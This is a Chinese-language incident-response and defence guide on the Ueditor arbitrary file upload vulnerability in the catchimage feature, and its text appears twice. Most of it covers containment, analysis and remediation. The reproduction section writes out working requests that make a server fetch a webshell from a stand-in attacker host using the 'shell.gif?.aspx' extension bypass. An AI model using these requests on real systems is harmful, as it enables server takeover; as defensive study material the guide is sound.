应急响应之Ueditor 任意文件上传漏洞攻击
字数 1446 2025-08-09 13:33:54

Ueditor 任意文件上传漏洞分析与防御指南

漏洞概述

Ueditor 是一款开源的富文本编辑器,在其 1.4.3.3 及之前版本中存在一个严重的任意文件上传漏洞。攻击者可以利用该漏洞上传恶意文件(如 WebShell)到服务器,进而获取服务器控制权限。

漏洞原理分析

漏洞位置

漏洞存在于 net/controller.ashx 文件中,具体涉及远程文件抓取功能(catchimage)。

漏洞触发流程

  1. 请求处理入口

    • 控制器接收 action 参数(controller.ashx?action=catchimage
    • action 值为 catchimage 时,执行远程文件抓取功能

  2. 参数验证缺陷

    • 检查 Sources 参数是否为空,但未对文件类型进行严格验证
    • 仅通过 Content-Type 检查文件是否为图片类型

  3. 关键漏洞点

    • 攻击者可伪造 Content-Type: image/jpeg 头来绕过文件类型检查
    • 文件名处理使用 GetFileName() 方法,该方法通过截取 URL 中最后一个.来获取文件名
    • 可利用 xxx.gif?.aspx 形式绕过扩展名检查(被解析为 .gif 但实际保存为 .aspx

漏洞复现步骤

  1. 漏洞检测

    GET /Ueditor/net/controller.ashx?action=catchimage

    预期响应:"参数错误:没有指定抓取源"(表明存在漏洞)

  2. 上传测试文件

    • 上传 HTML 文件测试: 
      POST /Ueditor/net/controller.ashx?action=catchimage
Sources[]=http://attacker.com/malicious.html
    • 上传图片马(WebShell): 
      POST /Ueditor/net/controller.ashx?action=catchimage
Sources[]=http://attacker.com/shell.gif?.aspx

  3. 访问上传的文件

    • 上传的文件通常保存在 f_load 目录下
    • 通过访问上传的 WebShell 文件获取服务器控制权

应急响应措施

1. 紧急处置

  • 立即断开受影响服务器的外网连接
  • 关闭服务器以防止进一步损害
  • 备份可疑文件(如木马文件、黑页等)供后续分析
  • 删除服务器上的恶意文件

2. 威胁分析

  • 检查上传的恶意文件类型(如案例中的冰蝎 aspx 木马)
  • 分析攻击者 IP 和域名(案例中为未备案的香港 IP)
  • 使用威胁情报平台验证攻击者基础设施的恶意性

3. 系统检查

  • 对网站进行全面后门扫描
  • 检查系统日志,确定攻击时间线和影响范围
  • 验证是否有其他系统被入侵

漏洞修复方案

临时修复措施

  1. 网络层防护

    • 配置防火墙策略,禁止外网 IP 访问敏感目录:
      • admin 目录(漏洞所在)
      • f_load 目录(上传文件存储位置)

  2. URL 重定向

    • 当访问漏洞 URL 时重定向到安全页面: 
      admin/Ueditor/net/controller.ashx?action=catchimage → admin/Logout.aspx

永久修复方案

  1. 代码层修复

    • 禁用或移除 catchimage 功能(如非必要)
    • 实现严格的文件类型检查(不依赖 Content-Type
    • 修复文件名解析逻辑,防止扩展名绕过
    • 关闭上传成功后的回显信息

  2. 安全增强

    • 实现文件上传白名单机制
    • 对上传文件进行内容检查
    • 设置上传目录不可执行权限

防御建议

  1. 版本升级

    • 升级到官方最新版本(注意:Ueditor 官网已停止维护)

  2. 安全配置

    • 限制上传文件大小
    • 对上传文件进行重命名(避免直接使用用户提供的文件名)
    • 定期审计上传目录内容

  3. 监控措施

    • 部署 WAF 规则检测此类攻击
    • 设置文件上传行为的日志监控和告警

总结

Ueditor 任意文件上传漏洞是一个高危漏洞,攻击者可利用它上传 WebShell 获取服务器控制权。应急响应时应遵循"隔离-分析-清除-修复"的流程,长期防御则需要从代码层和架构层进行安全加固。对于已停止维护的组件,建议考虑迁移到其他活跃维护的替代方案。

Ueditor 任意文件上传漏洞分析与防御指南 漏洞概述 Ueditor 是一款开源的富文本编辑器,在其 1.4.3.3 及之前版本中存在一个严重的任意文件上传漏洞。攻击者可以利用该漏洞上传恶意文件(如 WebShell)到服务器,进而获取服务器控制权限。 漏洞原理分析 漏洞位置 漏洞存在于 net/controller.ashx 文件中,具体涉及远程文件抓取功能(catchimage)。 漏洞触发流程 请求处理入口 : 控制器接收 action 参数( controller.ashx?action=catchimage ) 当 action 值为 catchimage 时,执行远程文件抓取功能 参数验证缺陷 : 检查 Sources 参数是否为空,但未对文件类型进行严格验证 仅通过 Content-Type 检查文件是否为图片类型 关键漏洞点 : 攻击者可伪造 Content-Type: image/jpeg 头来绕过文件类型检查 文件名处理使用 GetFileName() 方法,该方法通过截取 URL 中最后一个 . 来获取文件名 可利用 xxx.gif?.aspx 形式绕过扩展名检查(被解析为 .gif 但实际保存为 .aspx ) 漏洞复现步骤 漏洞检测 : 预期响应:"参数错误:没有指定抓取源"(表明存在漏洞) 上传测试文件 : 上传 HTML 文件测试: 上传图片马(WebShell): 访问上传的文件 : 上传的文件通常保存在 f_load 目录下 通过访问上传的 WebShell 文件获取服务器控制权 应急响应措施 1. 紧急处置 立即断开受影响服务器的外网连接 关闭服务器以防止进一步损害 备份可疑文件(如木马文件、黑页等)供后续分析 删除服务器上的恶意文件 2. 威胁分析 检查上传的恶意文件类型(如案例中的冰蝎 aspx 木马) 分析攻击者 IP 和域名(案例中为未备案的香港 IP) 使用威胁情报平台验证攻击者基础设施的恶意性 3. 系统检查 对网站进行全面后门扫描 检查系统日志,确定攻击时间线和影响范围 验证是否有其他系统被入侵 漏洞修复方案 临时修复措施 网络层防护 : 配置防火墙策略,禁止外网 IP 访问敏感目录: admin 目录(漏洞所在) f_load 目录(上传文件存储位置) URL 重定向 : 当访问漏洞 URL 时重定向到安全页面: 永久修复方案 代码层修复 : 禁用或移除 catchimage 功能(如非必要) 实现严格的文件类型检查(不依赖 Content-Type ) 修复文件名解析逻辑,防止扩展名绕过 关闭上传成功后的回显信息 安全增强 : 实现文件上传白名单机制 对上传文件进行内容检查 设置上传目录不可执行权限 防御建议 版本升级 : 升级到官方最新版本(注意:Ueditor 官网已停止维护) 安全配置 : 限制上传文件大小 对上传文件进行重命名(避免直接使用用户提供的文件名) 定期审计上传目录内容 监控措施 : 部署 WAF 规则检测此类攻击 设置文件上传行为的日志监控和告警 总结 Ueditor 任意文件上传漏洞是一个高危漏洞,攻击者可利用它上传 WebShell 获取服务器控制权。应急响应时应遵循"隔离-分析-清除-修复"的流程,长期防御则需要从代码层和架构层进行安全加固。对于已停止维护的组件,建议考虑迁移到其他活跃维护的替代方案。